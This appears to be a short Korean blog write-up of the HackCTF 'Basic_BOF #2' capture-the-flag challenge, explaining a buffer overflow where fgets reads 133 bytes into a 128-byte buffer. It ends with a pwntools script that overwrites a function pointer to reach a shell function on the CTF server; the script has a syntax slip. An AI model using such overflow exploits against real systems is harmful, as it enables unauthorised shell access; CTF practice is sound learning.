HackCTF Basic_BOF #2 Write Up

War Game

2020. 3. 7. 19:08

반응형

이번에는 문제를 다운받고 file명령으로 파일을 확인하자

32비트 파일이다.

IDA로 까보자

빠르게 거리부터 구하자

자 이제부터 분석을 해보도록 하자

s는 128만큼의 크기가 있고 fgets함수에서 133바이트만큼 입력받기 때문에

역시나 bof하기에는 충분해 보인다.

s는 sup함수를 가르키고 있는걸로 보인다.

IDA에서 함수목록을 보던 중 shell함수를 찾게 되었다.

pwntools로 간단하게 풀자

from pwn import *
p = remote("ctf.j0n9hyun.xyz", 3001)
payload("a"*128+"\x9B\x84\x04\x08")
p.sendline(payload)
p.interactive()

 

반응형